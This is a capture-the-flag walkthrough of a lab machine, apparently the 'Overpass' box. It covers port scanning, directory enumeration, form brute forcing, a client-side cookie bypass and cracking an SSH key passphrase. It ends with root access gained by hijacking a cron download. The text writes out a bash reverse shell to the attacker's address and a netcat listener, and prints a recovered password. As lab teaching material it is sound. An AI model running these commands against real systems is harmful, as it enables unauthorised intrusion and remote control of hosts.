Complex Attack Types: Sample Scenarios 21

3 weeks ago

Baris Dincer

Another beautiful scenario is before you. This time we will exploit another machine and carry out attacks both through the browser and through various tools.

It is very important for your abilities to be exposed to as many different scenarios as possible in this field.

Improve yourself tirelessly.

Do you want to start, punks?

You know what to do. Save the values you will use most often as shell variables. Never wait.

You can find various wordlists in /usr/share/wordlists.

Now it’s time to add the target IP to our local name resolution by putting an entry in the /etc/hosts file; some of the later steps depend on the hostname resolving.

Send a ping to the target machine and check.

We are ready now!

We can go exploring. Using Nmap, scan the target machine for open ports. This can reveal which services the host exposes: nmap -sV -sC -oA nmap_results/target_machine -A -T4 --script=vuln $target_ip

Service Version Detection (-sV): Identifies versions of running services on open ports.
Default Scripts (-sC): Executes the standard scripts that come with nmap.
Output Formats (-oA): Saves the scan results in normal, grepable, and XML formats.
Aggressive Scan (-A): Combines OS detection, service version detection, script scanning, and traceroute.
Timing Template (-T4): Speeds up the scan process.
Vulnerability Scripts (--script=vuln): Runs scripts that check for known vulnerabilities.

You need to be patient. You will get good evidence from here.

We added an output parameter (-oA) to the command so that you do not lose the results and can run specific queries against them later. You can find them in the file location you specified.

We discovered that ports 22 (SSH) and 80 (HTTP) are open. The scan also gives us version information and notes some potential vulnerabilities.

Investigate known exploits for the discovered versions.

There are some exploit approaches we can use for OpenSSH. Let’s download one for example: searchsploit -m linux/remote/45233.py

This python file is used for username enumeration. Check the content.

You should always explore how to use the script. Sometimes it has requirements and you must install the necessary packages; it is always healthier to do this in a virtual environment you create.

We deliberately show the errors below. The Python version a downloaded script was written for may differ from the one you run.

As you can see, it says we need to install a package. You can install this package and try running the script again.

We showed this as an example; we will not continue with this method.

We have a web server in front of us. Let’s go there and check the site.

You should check every detail you could use in a real scenario and analyse all reachable pages. Run a directory enumeration to discover hidden pages and applications. We will use gobuster for this: gobuster dir -w $wordlist_dir -u ourtargetsite.thm -r

Depending on the length of the wordlist, it takes time for the result to appear.

As you can see, we discovered some pages. This is good news for us. In particular, we also learn that the /admin page is accessible.

Let’s go to the admin page and see what’s available.

The first thing that comes to mind is to brute force the username and password. In real scenarios this attack is often detected and blocked (by a firewall, rate limiting or account lockout). You should be wary of this.

As an example, let’s show you how to do this through the ffuf tool. Of course, there are different tools and you are free to use whatever you want.

First we need to discover the parameters sent with the POST request. You can learn this from the developer tools (F12) in your browser, in the “Network” section. Open it and submit a random value.

You have seen the form of the request payload. We will use this.

Let’s go to the About section.

Some employees’ names are listed; these could be potential usernames.

Let’s create our own wordlist.

Save this wordlist in a shell variable named “usernames_target”.

Try this command: ffuf -w $usernames_target:W1,$wordlist_pass:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://ourtargetsite.thm/admin -fc 200

We couldn’t get results. As we said, this is an example.

Let’s look at the source code of the admin page.

The first thing that catches our eye on the page is three separate .js files.

We can learn the working principle of the mechanism by looking at the “login.js” file.

It looks like amateurish code with little thought given to security principles. We can investigate this.

By examining the login.js file, we observe that a SessionToken cookie is created when the administrator credentials are validated successfully. This cookie is instrumental in maintaining the user's session and authenticating subsequent requests.

In the login.js file, the following actions typically occur:

User Login: The admin enters their credentials (username and password) and submits the login form.
Credential Verification: The credentials are sent to the server, where they are checked against stored data.
SessionToken Generation: On successful verification of the admin credentials, the server generates a SessionToken.
Cookie Setting: The SessionToken is sent back to the client and stored as a cookie in the user's browser.

There is a gap in this structure. In login.js, the function handling the login checks the server response body to decide whether the credentials were correct. If the response is the text "Incorrect credentials", it displays an error message; otherwise it sets a SessionToken cookie with the returned value and redirects the user to the admin dashboard. Because the decision is made on the client, it allows us to add any cookie value ourselves.

The code stipulates that if the server responds with “Incorrect credentials” access to the administrator’s panel should be denied to the user. Conversely, if the server responds with anything other than “Incorrect credentials”, a session token is stored for the user, granting them access to the administrative panel.

Let’s test our theory. Open the “Storage” section of the developer tools.

Then add a new item with (+).

Now reload the page.

We got an RSA private key. We also have the names “james” and “paradox”. Save it now.

We have the key saved as the id_rsa.hash file. We need to crack its passphrase. We can use ssh2john to convert the key into a format that the john tool can work with.

Now we can use john tool: john --wordlist=/usr/share/wordlists/rockyou.txt john_rsa

We got the RSA passphrase.

Let’s open an SSH connection as this user. First, set restrictive permissions on the file containing the RSA key you saved earlier; SSH refuses a private key that other users can read.

Then connect: ssh -i id_rsa james@10.10.87.118

We got a connection.

The first thing you should do is check your privileges; we will escalate them if necessary.

Oops… Listing our permissions requires a password. Let’s look at the evidence.

We need to find a file related to “overpass”.

There is a strange obfuscated message. We need to try to break it. Use https://www.dcode.fr/rot-47-cipher

We have a result. Let’s keep this:

[{"name":"System","pass":"saydrawnlyingpicture"}]
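The decoding can also be done locally instead of through a web tool. This is an added example, not part of the original post: a ROT47 routine applied to a ciphertext constructed by ROT47-encoding the plaintext recovered above (the function names are mine).

```javascript
// ROT47 rotates every printable ASCII character (code 33 '!' to 126 '~') by 47
// positions within that 94-character range. 47 is half of 94, so applying the
// function twice restores the text: the same routine encodes and decodes.
function rot47(text) {
  let out = "";
  for (const ch of text) {
    const code = ch.charCodeAt(0);
    if (code >= 33 && code <= 126) {
      out += String.fromCharCode(33 + ((code - 33 + 47) % 94));
    } else {
      out += ch; // spaces, newlines and non-ASCII characters pass through
    }
  }
  return out;
}

// Constructed ciphertext: the plaintext shown above, ROT47-encoded.
const OBFUSCATED_CREDS = ",LQ?2>6QiQ$JDE6>Q[QA2DDQiQD2J5C2H?=J:?8A:4EFC6QN.";

// Decode the stored blob and parse the JSON it contains. ROT47 is obfuscation,
// not encryption: anyone who can read the file recovers the password at once.
function decodeStoredCredentials(blob) {
  return JSON.parse(rot47(blob));
}
```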

We need to list SUID executables: find / -perm -u=s -type f 2>/dev/null

There aren’t many useful details. Keep searching.

Let’s investigate “crontab”.

We found an interesting entry that runs a “.sh” script fetched with “curl”.

The request goes to “overpass.thm”. We might be able to modify the /etc/hosts file so that the target downloads a malicious “buildscript.sh” from our machine instead.

First, let’s create “/downloads/src/” on our own machine so that the file path matches.

Now create “buildscript.sh” and put the reverse shell code into it: bash -i >& /dev/tcp/10.10.255.233/9001 0>&1

Start a web server on our local machine.

Create a netcat listener: nc -nlvp 9001

Now let’s manipulate “/etc/hosts” on the target machine and add our own machine IP.

We are ready. Just wait for the connection.

We got that.
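From the defender's side, the weak link in this chain is a root cron job that pipes a download from a hostname into a shell, with that hostname pinned in a locally editable /etc/hosts. The following added example (not from the original post) scans constructed crontab and /etc/hosts text for exactly that pattern; the sample lines, regex and function names are mine.

```javascript
// Constructed system-crontab content (fields: schedule, user, command).
const SAMPLE_CRONTAB = `
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
* * * * * root curl overpass.thm/downloads/src/buildscript.sh | bash
*/5 * * * * backup wget -qO- http://backup.example.internal/job.sh | sh
`;

// Constructed /etc/hosts content; overpass.thm is pinned to a non-local address.
const SAMPLE_HOSTS = `
127.0.0.1 localhost
127.0.1.1 overpass
10.10.255.233 overpass.thm
`;

// "curl|wget ... <host or url> ... | sh/bash": a downloaded script run blind.
const PIPE_TO_SHELL =
  /\b(?:curl|wget)\b[^|]*?\s((?:https?:\/\/)?[A-Za-z0-9][A-Za-z0-9.-]*)[^|]*\|\s*(?:ba)?sh\b/;

// Map every hostname in /etc/hosts to the address it is pinned to.
function parseHosts(hostsText) {
  const map = {};
  for (const line of hostsText.split("\n")) {
    const fields = line.replace(/#.*/, "").trim().split(/\s+/);
    if (fields[0] === "" || fields.length < 2) continue;
    for (const name of fields.slice(1)) map[name] = fields[0];
  }
  return map;
}

// One finding per cron job that pipes a download into a shell, noting whether
// its host is resolved by a local /etc/hosts entry rather than by DNS.
function findPipedDownloads(crontabText, hostsText) {
  const hosts = parseHosts(hostsText);
  const findings = [];
  for (const line of crontabText.split("\n")) {
    const trimmed = line.trim();
    if (trimmed === "" || trimmed.startsWith("#")) continue;
    const match = PIPE_TO_SHELL.exec(trimmed);
    if (!match) continue;
    const host = match[1].replace(/^https?:\/\//, "");
    findings.push({
      user: trimmed.split(/\s+/)[5],
      host,
      pinnedInHostsFile: Object.prototype.hasOwnProperty.call(hosts, host),
      resolvesTo: hosts[host] || null,
    });
  }
  return findings;
}
```

A job flagged with pinnedInHostsFile set to true and a non-loopback address is the condition this scenario abused; the fix is to ship the script with the host or verify it (checksum or signature) before running it.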

Don’t give up on hacking.

Code for good.

^-^